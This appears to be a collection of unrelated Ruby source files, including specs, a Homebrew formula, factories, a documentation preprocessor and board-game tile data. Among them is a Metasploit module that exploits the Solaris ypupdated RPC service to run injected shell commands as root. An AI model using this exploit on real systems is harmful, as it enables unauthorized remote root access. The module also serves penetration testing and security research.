            enabled_clean_options[app_service.data_protection.untilfirstauth.service_id] = app_service.data_protection.untilfirstauth
          end
        elsif k.to_sym == :icloud
          case v
          when SERVICE_LEGACY
            enabled_clean_options[app_service.icloud.on.service_id] = app_service.icloud.on
            enabled_clean_options[app_service.cloud_kit.xcode5_compatible.service_id] = app_service.cloud_kit.xcode5_compatible
          when SERVICE_CLOUDKIT
            enabled_clean_options[app_service.icloud.on.service_id] = app_service.icloud.on
            enabled_clean_options[app_service.cloud_kit.cloud_kit.service_id] = app_service.cloud_kit.cloud_kit
          end
        else
          if v == SERVICE_ON
            enabled_clean_options[app_service.send(k.to_s).on.service_id] = app_service.send(k.to_s).on
          else
            enabled_clean_options[app_service.send(k.to_s).off.service_id] = app_service.send(k.to_s).off
          end
        end
      end
      enabled_clean_options
    end

    def app_identifier
      Produce.config[:app_identifier].to_s
    end

    private

    def app_exists?
      Spaceship.app.find(app_identifier, mac: Produce.config[:platform] == "osx") != nil
    end

    def login
      Spaceship.login(Produce.config[:username], nil)
      Spaceship.select_team
    end
  end
end
37.847328
154
0.669221
3823026771b76e9fe24fb3f1c5accefa17ac97f4
1,281
require 'spec_helper'

shared_examples_for 'an searchable essence' do
  let(:essence_type) { essence_class.model_name.name.demodulize }
  let(:content) { create(:alchemy_content) }

  before do
    allow(content).to receive(:essence_class).and_return(essence_class)
  end

  context 'with searchable set to true' do
    before do
      allow(content).to receive(:definition).and_return({
        'type' => essence_type,
        'searchable' => true
      })
    end

    it "sets the searchable attribute to true" do
      content.create_essence!
      expect(content.essence.searchable).to be(true)
    end
  end

  context 'with searchable set to false' do
    before do
      allow(content).to receive(:definition).and_return({
        'type' => essence_type,
        'searchable' => false
      })
    end

    it "sets the searchable attribute to false" do
      content.create_essence!
      expect(content.essence.searchable).to be(false)
    end
  end

  context 'with searchable key missing' do
    before do
      allow(content).to receive(:definition).and_return({
        'type' => essence_type
      })
    end

    it "sets the searchable attribute to true" do
      content.create_essence!
      expect(content.essence.searchable).to be(true)
    end
  end
end
24.634615
71
0.661983
6241124af1cd7c7d5fb2753a6a1b5e9523b96300
2,594
require_relative '../spec_helper'

describe "cnb" do
  it "locally runs default_ruby app" do
    Cutlass::App.new("default_ruby").transaction do |app|
      app.pack_build

      expect(app.stdout).to include("Installing rake")

      app.run_multi("ruby -v") do |out|
        expect(out.stdout).to match(LanguagePack::RubyVersion::DEFAULT_VERSION_NUMBER)
      end

      app.run_multi("bundle list") do |out|
        expect(out.stdout).to match("rack")
      end

      app.run_multi("gem list") do |out|
        expect(out.stdout).to match("rack")
      end

      app.run_multi(%Q{ruby -e "require 'rack'; puts 'done'"}) do |out|
        expect(out.stdout).to match("done")
      end

      # Test cache
      app.pack_build

      expect(app.stdout).to include("Using rake")
    end
  end

  it "uses multiple buildpacks" do
    Dir.mktmpdir do |second_buildpack_dir|
      FileUtils.mkdir_p("#{second_buildpack_dir}/bin")

      File.open("#{second_buildpack_dir}/buildpack.toml", "w") do |f|
        f.write <<~EOM
          # Buildpack API version
          api = "0.2"

          # Buildpack ID and metadata
          [buildpack]
          id = "com.examples.buildpacks.test_ruby_export"
          version = "0.0.1"
          name = "Test Ruby Export Buildpack"

          # Stacks that the buildpack will work with
          [[stacks]]
          id = "heroku-20"

          [[stacks]]
          id = "org.cloudfoundry.stacks.cflinuxfs3"
        EOM
      end

      File.open("#{second_buildpack_dir}/bin/detect", "w") do |f|
        f.write <<~EOM
          #! /usr/bin/env bash

          exit 0
        EOM
      end

      File.open("#{second_buildpack_dir}/bin/build", "w") do |f|
        f.write <<~EOM
          #! /usr/bin/env bash

          echo "Which gem: $(which gem)"

          exit 0
        EOM
      end

      FileUtils.chmod("+x", "#{second_buildpack_dir}/bin/detect")
      FileUtils.chmod("+x", "#{second_buildpack_dir}/bin/build")

      Cutlass::App.new("default_ruby", buildpacks: [:default, second_buildpack_dir]).transaction do |app|
        app.pack_build

        expect(app.stdout).to match("Compiling Ruby/Rack")
        expect(app.stdout).to match("com.examples.buildpacks.test_ruby_export")
        expect(app.stdout).to match("Which gem: /workspace/bin/gem")
      end
    end
  end

  it "locally runs rails getting started" do
    Cutlass::App.new("ruby-getting-started").transaction do |app|
      app.pack_build

      expect(app.stdout).to match("Compiling Ruby/Rails")

      expect(app.run("ruby -v").stdout).to match("2.7.4")
    end
  end
end
27.020833
105
0.595991
01eb17f58a8db86d185141bb40ed2a17a78ea292
2,848
module Spec
  module Extensions
    module Main
      # Creates and returns a class that includes the ExampleGroupMethods
      # module. Which ExampleGroup type is created depends on the directory of the file
      # calling this method. For example, Spec::Rails will use different
      # classes for specs living in <tt>spec/models</tt>,
      # <tt>spec/helpers</tt>, <tt>spec/views</tt> and
      # <tt>spec/controllers</tt>.
      #
      # It is also possible to override autodiscovery of the example group
      # type with an options Hash as the last argument:
      #
      #   describe "name", :type => :something_special do ...
      #
      # The reason for using different behaviour classes is to have different
      # matcher methods available from within the <tt>describe</tt> block.
      #
      # See Spec::Example::ExampleFactory#register for details about how to
      # register special implementations.
      #
      def describe(*args, &block)
        raise ArgumentError if args.empty?
        raise ArgumentError unless block
        args << {} unless Hash === args.last
        args.last[:spec_path] = caller(0)[1]
        Spec::Example::ExampleGroupFactory.create_example_group(*args, &block)
      end
      alias :context :describe

      # Creates an example group that can be shared by other example groups
      #
      # == Examples
      #
      #   share_examples_for "All Editions" do
      #     it "all editions behaviour" ...
      #   end
      #
      #   describe SmallEdition do
      #     it_should_behave_like "All Editions"
      #
      #     it "should do small edition stuff" do
      #       ...
      #     end
      #   end
      def share_examples_for(name, &block)
        describe(name, :shared => true, &block)
      end
      alias :shared_examples_for :share_examples_for

      # Creates a Shared Example Group and assigns it to a constant
      #
      #   share_as :AllEditions do
      #     it "should do all editions stuff" ...
      #   end
      #
      #   describe SmallEdition do
      #     it_should_behave_like AllEditions
      #
      #     it "should do small edition stuff" do
      #       ...
      #     end
      #   end
      #
      # And, for those of you who prefer to use something more like Ruby, you
      # can just include the module directly
      #
      #   describe SmallEdition do
      #     include AllEditions
      #
      #     it "should do small edition stuff" do
      #       ...
      #     end
      #   end
      def share_as(name, &block)
        begin
          Object.const_set(name, share_examples_for(name, &block))
        rescue NameError => e
          raise NameError.new(e.message + "\nThe first argument to share_as must be a legal name for a constant\n")
        end
      end
    end
  end
end

include Spec::Extensions::Main
32.735632
115
0.596559
e9a9bd941955f171968ed11ec6e3aaa9c148ed3e
290
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.

module Azure end
module Azure::Resources end
module Azure::Resources::Mgmt end
module Azure::Resources::Mgmt::V2019_05_10 end
29
70
0.782759
1895f83a7ef2fd69eabbda051b5fa7e4799b4e5a
21
depends "ruby_build"
10.5
20
0.809524
bb50921c7b0b7cca6e6d152fc14c4c4b20205cf6
3,253
class Wangle < Formula
  desc "Modular, composable client/server abstractions framework"
  homepage "https://github.com/facebook/wangle"
  url "https://github.com/facebook/wangle/releases/download/v2021.09.27.00/wangle-v2021.09.27.00.tar.gz"
  sha256 "c23840578f73a0316ef58cd0e95ed001dbf5e893740d72c157f579ac2342558a"
  license "Apache-2.0"
  head "https://github.com/facebook/wangle.git", branch: "master"

  bottle do
    sha256 cellar: :any, arm64_big_sur: "49bfbd4664d9a349d6b721cffbf144aee4fbc6bc7cb8c315d4313d234996f1e3"
    sha256 cellar: :any, big_sur: "6cb44fa77d4014e5a2f1dc2978dc8368ca71b97e0a3705278c31c0044bb948f8"
    sha256 cellar: :any, catalina: "467066e9c01790758560384384ae09f0e845670406d354b78206699f9d67b0ae"
    sha256 cellar: :any, mojave: "9814e4d63c4d91902e75f1be7054a4ebc7cd79843b8e512d5ff5cb29179e76cf"
    sha256 cellar: :any_skip_relocation, x86_64_linux: "fbe37e8cabde712d8a70262edb862158845b1bf37ad961748191ea2b7a70d140"
  end

  depends_on "cmake" => :build
  depends_on "boost"
  depends_on "double-conversion"
  depends_on "fizz"
  depends_on "fmt"
  depends_on "folly"
  depends_on "gflags"
  depends_on "glog"
  depends_on "libevent"
  depends_on "libsodium"
  depends_on "lz4"
  depends_on "[email protected]"
  depends_on "snappy"
  depends_on "zstd"

  uses_from_macos "bzip2"
  uses_from_macos "zlib"

  on_linux do
    depends_on "gcc"
  end

  fails_with gcc: "5"

  def install
    cd "wangle" do
      system "cmake", ".", "-DBUILD_TESTS=OFF", "-DBUILD_SHARED_LIBS=ON", *std_cmake_args
      system "make", "install"

      system "make", "clean"
      system "cmake", ".", "-DBUILD_TESTS=OFF", "-DBUILD_SHARED_LIBS=OFF", *std_cmake_args
      system "make"
      lib.install "lib/libwangle.a"

      pkgshare.install Dir["example/echo/*.cpp"]
    end
  end

  test do
    cxx_flags = %W[
      -std=c++14
      -I#{include}
      -I#{Formula["[email protected]"].opt_include}
      -L#{Formula["gflags"].opt_lib}
      -L#{Formula["glog"].opt_lib}
      -L#{Formula["folly"].opt_lib}
      -L#{Formula["fizz"].opt_lib}
      -L#{lib}
      -lgflags
      -lglog
      -lfolly
      -lfizz
      -lwangle
    ]

    on_linux do
      cxx_flags << "-L#{Formula["boost"].opt_lib}"
      cxx_flags << "-lboost_context-mt"
      cxx_flags << "-ldl"
      cxx_flags << "-lpthread"
    end

    system ENV.cxx, pkgshare/"EchoClient.cpp", *cxx_flags, "-o", "EchoClient"
    system ENV.cxx, pkgshare/"EchoServer.cpp", *cxx_flags, "-o", "EchoServer"

    port = free_port

    ohai "Starting EchoServer on port #{port}"
    fork { exec testpath/"EchoServer", "-port", port.to_s }
    sleep 3

    require "pty"

    output = ""
    PTY.spawn(testpath/"EchoClient", "-port", port.to_s) do |r, w, pid|
      ohai "Sending data via EchoClient"
      w.write "Hello from Homebrew!\nAnother test line.\n"
      sleep 3
      Process.kill "TERM", pid
      begin
        ohai "Reading received data"
        r.each_line { |line| output += line }
      rescue Errno::EIO
        # GNU/Linux raises EIO when read is done on closed pty
      end
    end
    assert_match("Hello from Homebrew!", output)
    assert_match("Another test line.", output)
  end
end
31.582524
122
0.659699
39a8553c3d056414e31c2eadc92a2cfc72db1c98
208
require 'spec_helper'

describe TopSupplement do
  it 'has a version number' do
    expect(TopSupplement::VERSION).not_to be nil
  end

  it 'does something useful' do
    expect(false).to eq(true)
  end
end
17.333333
48
0.721154
4a2d57b75cd6b2ff891add171ac79bf1f5cddd93
1,602
FactoryGirl.define do
  factory :user do
    password { "railsisomakase" }
    password_confirmation { "railsisomakase" }
    email { Faker::Internet.email }

    factory :v1_user do
      md5_password "e53522351c4cfce1b2c3ecb3f4dbf2cd" # letmeinplease

      # v1 users will never sign up, so do not use the interactor, just generate the model.
      initialize_with do
        new
      end
    end

    factory :v2_user do
      password "letmeinplease"
      password_confirmation "letmeinplease"
    end

    factory :developer do
    end

    factory :oauth_user do
    end

    factory :iot_user do
      email "[email protected]"
    end

    factory :old_user_github do
      email "[email protected]"
    end

    factory :admin do
      after(:create) do |user|
        user.update_attribute :roles, ['admin']
        user.update_attribute :created_at, 1.day.ago
        user.update_attribute :updated_at, 1.day.ago
      end
    end

    ## !! Overriding the initializer !! ##
    #
    # We do this because the SignUp interactor is critical to how users are created.
    # But it means you can't FactoryGirl.create a user and expect that it just works.
    # If you need to set various attributes on a factory girl'd user, you must do
    # it separately from the .create.
    initialize_with do
      VCR.use_cassette "users/create" do
        SignUp.call(attributes.merge(root_url: "http://test.example.com/")).user
      end
    end
  end
end
26.262295
91
0.609863
79b1db4dbef4bbfdbd98ac095a84362fef33586e
474
# frozen_string_literal: true
require 'spec_helper'
require 'vk/api/groups/methods/get_catalog'

RSpec.describe Vk::API::Groups::Methods::GetCatalog do
  subject(:model) { described_class }

  it { is_expected.to be < Dry::Struct }
  it { is_expected.to be < Vk::Schema::Method }

  describe 'attributes' do
    subject(:attributes) { model.instance_methods(false) }

    it { is_expected.to include :category_id }
    it { is_expected.to include :subcategory_id }
  end
end
27.882353
58
0.725738
33692c43b0649d80c4787ed73953d409d4ca0c49
2,670
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SunRPC

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Solaris ypupdated Command Execution',
      'Description' => %q{
        This exploit targets a weakness in the way the ypupdated RPC
        application uses the command shell when handling a MAP UPDATE
        request. Extra commands may be launched through this command shell,
        which runs as root on the remote host, by passing commands in the
        format '|<command>'. Vulnerable systems include Solaris 2.7, 8, 9,
        and 10, when ypupdated is started with the '-i' command-line option.
      },
      'Author' => [ 'I)ruid <druid[at]caughq.org>' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '1999-0209'],
          ['OSVDB', '11517'],
          ['BID', '1749'],
        ],
      'Privileged' => true,
      'Platform' => %w{ solaris unix },
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets' =>
        [
          ['Automatic', { }],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Dec 12 1994'
    ))

    register_options(
      [
        OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
        OptInt.new('GID', [false, 'GID to emulate', 0]),
        OptInt.new('UID', [false, 'UID to emulate', 0])
      ],
      self.class
    )
  end

  def exploit
    hostname = datastore['HOSTNAME']
    program = 100028
    progver = 1
    procedure = 1

    print_status('Sending PortMap request for ypupdated program')
    pport = sunrpc_create('udp', program, progver)

    print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
    print_status('Waiting for response...')

    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])

    command = '|' + payload.encoded

    msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)

    sunrpc_call(procedure, msg)
    sunrpc_destroy

    print_status('No Errors, appears to have succeeded!')
  rescue ::Rex::Proto::SunRPC::RPCTimeout
    print_warning('Warning: ' + $!)
  end
end
31.411765
81
0.553933
acdf6265e7a1e43f558fa96c119acffdecba057a
793
# encoding: UTF-8

require_dependency 'carto/superadmin/metrics_controller_helper'

module Carto
  module Superadmin
    class UsersController < ::Superadmin::SuperadminController
      include MetricsControllerHelper

      respond_to :json

      ssl_required :usage

      before_filter :load_user

      rescue_from ArgumentError, with: :render_format_error

      def usage
        usage = get_usage(@user, nil, @user.last_billing_cycle)
        respond_with(usage)
      end

      private

      def render_format_error(exception)
        render(json: { error: exception.message }, status: 422)
      end

      def load_user
        @user = Carto::User.where(id: params[:id]).first
        render json: { error: 'User not found' }, status: 404 unless @user
      end
    end
  end
end
22.027778
74
0.67087
1a07e43145d4eec53f5f7842827fe6a85bb3afd2
79
$LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'smart_uri'
26.333333
58
0.734177
5db4872d29cbf658c14d26bc6b865e6df39c402f
459
# == Schema Information
#
# Table name: roles
#
#  id            :integer          not null, primary key
#  name          :string(255)
#  resource_id   :integer
#  resource_type :string(255)
#  created_at    :datetime         not null
#  updated_at    :datetime         not null
#

class Role < ActiveRecord::Base
  has_and_belongs_to_many :users, :join_table => :users_roles
  belongs_to :resource, :polymorphic => true
  has_many :permissions
  scopify
end
24.157895
61
0.64488
8761a23c28679282d651f96c6345f20e46aaefc9
233
require "rspec-puppet" fixture_path = File.expand_path(File.join(__FILE__, "..", "fixtures")) RSpec.configure do |c| c.manifest_dir = File.join(fixture_path, "manifests") c.module_path = File.join(fixture_path, "modules") end
25.888889
70
0.729614
01bd8fc6b207659a7c762ce2fca65a91174c190e
318
# frozen_string_literal: true

require_relative '../downloads/client'

module Crunchbase
  # Utilities
  module Utilities
    # Daily csv export
    module Downloads
      def download_bulk(dir, extract: false)
        Crunchbase::Downloads::Client.new.download_bulk(dir, extract: extract)
      end
    end
  end
end
19.875
78
0.710692
0156bc1e17376942d740406d3cf9bf15f156aaf9
1,145
ActiveAdmin.register_page "Dashboard" do

  menu priority: 0, label: proc{ I18n.t("active_admin.dashboard") }

  content :title => proc{ I18n.t("active_admin.dashboard") } do
    # Here is an example of a simple dashboard with columns and panels.
    columns do
      column do
        panel I18n.t("active_admin.statistics.events_by_category") do
          pie_chart Event.group_by_category
        end
      end
      column do
        panel I18n.t("active_admin.statistics.users_over_time") do
          line_chart User.over_time
        end
      end
    end
    columns do
      column do
        panel I18n.t("active_admin.statistics.single_events_this_week_by_day") do
          column_chart SingleEvent.this_week_by_day
        end
      end
      column do
        panel I18n.t("active_admin.statistics.single_events_this_week_by_category") do
          pie_chart SingleEvent.this_week_by_category
        end
      end
    end
    columns do
      column do
        panel I18n.t("active_admin.statistics.single_events_this_week_by_city") do
          pie_chart SingleEvent.this_week_by_city
        end
      end
    end
  end
end
26.022727
86
0.665502
ac6a40e2f5459a69f51cf57b9dac247182c0e4fe
2,084
class Fn < Formula
  desc "Command-line tool for the fn project"
  homepage "https://fnproject.github.io"
  url "https://github.com/fnproject/cli/archive/0.4.49.tar.gz"
  sha256 "1378ca0e114666a5d7dfa726557d0196982269cbf91a38a6c667e0d7f4a2a32e"

  bottle do
    cellar :any_skip_relocation
    sha256 "79525a473b2241f59f6b4125f8dbe8ca44405a843f0f80454e862abfe35adaca" => :high_sierra
    sha256 "cb2a6448b726d5e0a0ecd7684076c285145e7a7de0c9e31f8fde37bd6f97401c" => :sierra
    sha256 "40666fe81e40c22b7b27fc1fb8d939b4dbd0d50f32539028635514c6fff1ba66" => :el_capitan
  end

  depends_on "dep" => :build
  depends_on "go" => :build

  def install
    ENV["GOPATH"] = buildpath
    dir = buildpath/"src/github.com/fnproject/cli"
    dir.install Dir["*"]

    cd dir do
      system "dep", "ensure"
      system "go", "build", "-o", "#{bin}/fn"
      prefix.install_metafiles
    end
  end

  test do
    require "socket"

    assert_match version.to_s, shell_output("#{bin}/fn --version")

    system "#{bin}/fn", "init", "--runtime", "go", "--name", "myfunc"
    assert_predicate testpath/"func.go", :exist?, "expected file func.go doesn't exist"
    assert_predicate testpath/"func.yaml", :exist?, "expected file func.yaml doesn't exist"

    server = TCPServer.new("localhost", 0)
    port = server.addr[1]

    pid = fork do
      loop do
        socket = server.accept
        response = '{"route": {"path": "/myfunc", "image": "fnproject/myfunc"} }'
        socket.print "HTTP/1.1 200 OK\r\n" \
                     "Content-Length: #{response.bytesize}\r\n" \
                     "Connection: close\r\n"
        socket.print "\r\n"
        socket.print response
        socket.close
      end
    end

    begin
      ENV["FN_API_URL"] = "http://localhost:#{port}"
      ENV["FN_REGISTRY"] = "fnproject"
      expected = "/myfunc created with fnproject/myfunc"
      output = shell_output("#{bin}/fn routes create myapp myfunc --image fnproject/myfunc:0.0.1")
      assert_match expected, output.chomp
    ensure
      Process.kill("TERM", pid)
      Process.wait(pid)
    end
  end
end
34.733333
98
0.65499
084a4ddcf5d51be93f9f17f22524c79df5cda382
5,833
# frozen_string_literal: true require "liquid" require "asciidoctor" require "asciidoctor/reader" require "lutaml" require "metanorma/plugin/lutaml/utils" require "metanorma/plugin/lutaml/utils" require "metanorma/plugin/lutaml/express_remarks_decorator" module Metanorma module Plugin module Lutaml # Class for processing Lutaml files class LutamlPreprocessor < Asciidoctor::Extensions::Preprocessor REMARKS_ATTRIBUTE = "remarks".freeze def process(document, reader) input_lines = reader.readlines.to_enum express_indexes = Utils.parse_document_express_indexes( document, input_lines ) result_content = processed_lines(document, input_lines, express_indexes) result_reader = Asciidoctor::PreprocessorReader.new(document, result_content) result_reader end protected def content_from_files(document, file_paths) file_list = file_paths.map do |file_path| File.new(Utils.relative_file_path(document, file_path), encoding: "UTF-8") end ::Lutaml::Parser.parse(file_list) end private def processed_lines(document, input_lines, express_indexes) result = [] loop do result .push(*process_text_blocks( document, input_lines, express_indexes )) end result end def process_text_blocks(document, input_lines, express_indexes) line = input_lines.next block_match = line.match(/^\[(?:\blutaml\b|\blutaml_express\b),([^,]+)?,?([^,]+)?,?([^,]+)?\]/) return [line] if block_match.nil? end_mark = input_lines.next parse_template(document, collect_internal_block_lines(document, input_lines, end_mark), block_match, express_indexes) end def collect_internal_block_lines(_document, input_lines, end_mark) current_block = [] while (block_line = input_lines.next) != end_mark current_block.push(block_line) end current_block end def contexts_items(block_match, document, express_indexes) contexts_names = block_match[1].split(";").map(&:strip) file_paths = [] result = contexts_names.each_with_object([]) do |path, res| if express_indexes[path] res.push(express_indexes[path]) else file_paths.push(path) end end if !file_paths.empty? 
from_files = content_from_files(document, file_paths) # TODO: decide how to handle expressir multiply file parse as one object and lutaml if from_files.is_a?(Array) result.push(*from_files.map(&:to_liquid)) else from_files = from_files.to_liquid from_files["schemas"] = from_files["schemas"].map do |n| n.merge("relative_path_prefix" => Utils.relative_file_path(document, File.dirname(n["file"]))) end result.push(from_files) end end result end def parse_template(document, current_block, block_match, express_indexes) options = parse_options(block_match[3]) contexts_items(block_match, document, express_indexes) .map do |items| if items["schemas"] items["schemas"] = items["schemas"].map do |j| opts = options.merge("relative_path_prefix" => j["relative_path_prefix"]) decorate_context_items(j, opts) end end parse_context_block(document: document, context_lines: current_block, context_items: items, context_name: block_match[2].strip) end.flatten rescue StandardError => e document.logger.warn("Failed to parse lutaml block: #{e.message}") [] end def parse_options(options_string) options_string .to_s .scan(/(.+?)=(\s?[^\s]+)/) .map { |elem| elem.map(&:strip) } .to_h end def decorate_context_items(context_items, options) return context_items if !context_items.is_a?(Hash) context_items .map do |(key, val)| if val.is_a?(Hash) [key, decorate_context_items(val, options)] elsif key == REMARKS_ATTRIBUTE [key, val&.map do |remark| Metanorma::Plugin::Lutaml::ExpressRemarksDecorator .call(remark, options) end] elsif val.is_a?(Array) [key, val.map { |n| decorate_context_items(n, options) }] else [key, val] end end .to_h end def parse_context_block(context_lines:, context_items:, context_name:, document:) render_result, errors = Utils.render_liquid_string( template_string: context_lines.join("\n"), context_items: context_items, context_name: context_name, document: document ) Utils.notify_render_errors(document, errors) render_result.split("\n") end end end end end
34.720238
110
0.541917
21bfc21213e3450bf23aabe71f56eceb14c88b0c
19,773
# frozen_string_literal: true module Engine module Game module G1862 module Map TILES = { '5' => 10, '6' => 10, '14' => 11, '15' => 10, '16' => 2, '16_1a' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20,loc:0;path=a:0,b:_0;path=a:2,b:_0;path=a:1,b:3', }, '16_1b' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20,loc:3;path=a:1,b:_0;path=a:3,b:_0;path=a:0,b:2', }, '16_2' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:3,b:_0;path=a:0,b:_1;path=a:2,b:_1', }, '17' => 5, '17_1' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:3', }, '17_2' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:_1;path=a:3,b:_1', }, '18' => 5, '18_1a' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:2', }, '18_1b' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;path=a:0,b:3', }, '18_2' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;path=a:0,b:_1;path=a:3,b:_1', }, '19' => 4, '19_1a' => { 'count' => 4, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20,loc:0;path=a:0,b:_0;path=a:3,b:_0;path=a:2,b:4', }, '19_1b' => { 'count' => 4, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:2,b:_0;path=a:4,b:_0;path=a:0,b:3', }, '19_2' => { 'count' => 4, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:2,b:_0;path=a:4,b:_0;path=a:0,b:_1;path=a:3,b:_1', }, '20' => 6, '20_1' => { 'count' => 6, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:4', }, '20_2' => { 'count' => 6, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:_1;path=a:4,b:_1', }, '21' => 2, '21_1a' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:2,b:_0;path=a:3,b:4', }, '21_1b' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:3,b:_0;path=a:4,b:_0;path=a:0,b:2', }, '21_2' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:3,b:_0;path=a:4,b:_0;path=a:0,b:_1;path=a:2,b:_1', }, '22' => 2, '22_1a' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:2,b:3', }, '22_1b' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:2,b:_0;path=a:3,b:_0;path=a:0,b:4', }, '22_2' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:2,b:_0;path=a:3,b:_0;path=a:0,b:_1;path=a:4,b:_1', }, '53y' => { 'count' => 6, 'color' => 'green', 'code' => 'city=revenue:50,slots:2;path=a:0,b:_0;path=a:2,b:_0;path=a:4,b:_0;label=Y', }, '57' => 12, '61y' => { 'count' => 3, 'color' => 'brown', 'code' => 'city=revenue:60,slots:2;path=a:0,b:_0;path=a:2,b:_0;path=a:4,b:_0;path=a:4,b:_0;label=Y', }, '201' => 2, '202' => 4, '611' => 8, '619' => 10, '621' => 2, '778' => { 'count' => 4, 'color' => 'brown', 'code' => 'path=a:0,b:4;path=a:1,b:3;path=a:2,b:5', }, '778_1a' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 
'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:3;path=a:2,b:5', }, '778_1b' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:2,b:_0;path=a:5,b:_0;path=a:1,b:3;path=a:0,b:4', }, '778_2a' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:2,b:_1;path=a:5,b:_1;'\ 'path=a:1,b:3', }, '778_2b' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:_1;path=a:3,b:_1;'\ 'path=a:2,b:5', }, '778_3' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20,loc:2;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;'\ 'path=a:2,b:_1;path=a:5,b:_1;path=a:1,b:_2;path=a:3,b:_2', }, '779' => { 'count' => 3, 'color' => 'brown', 'code' => 'path=a:0,b:4;path=a:1,b:5;path=a:2,b:3', }, '779_1a' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:5;path=a:2,b:3', }, '779_1b' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:1,b:_0;path=a:5,b:_0;path=a:0,b:4;path=a:2,b:3', }, '779_1c' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:2,b:_0;path=a:3,b:_0;path=a:0,b:4;path=a:1,b:5', }, '779_2a' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:_1;path=a:5,b:_1;'\ 'path=a:2,b:3', }, '779_2b' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:2,b:_1;path=a:3,b:_1;'\ 'path=a:1,b:5', }, '779_2c' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:5,b:_0;path=a:2,b:_1;path=a:3,b:_1;'\ 'path=a:0,b:4', }, '779_3' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:5,b:_0;'\ 'path=a:2,b:_1;path=a:3,b:_1;path=a:0,b:_2;path=a:4,b:_2', }, '780' => { 'count' => 3, 'color' => 'brown', 'code' => 'path=a:0,b:3;path=a:1,b:2;path=a:4,b:5', }, '780_1a' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:2;path=a:4,b:5', }, '780_1b' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;path=a:0,b:3;path=a:4,b:5', }, '780_2a' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 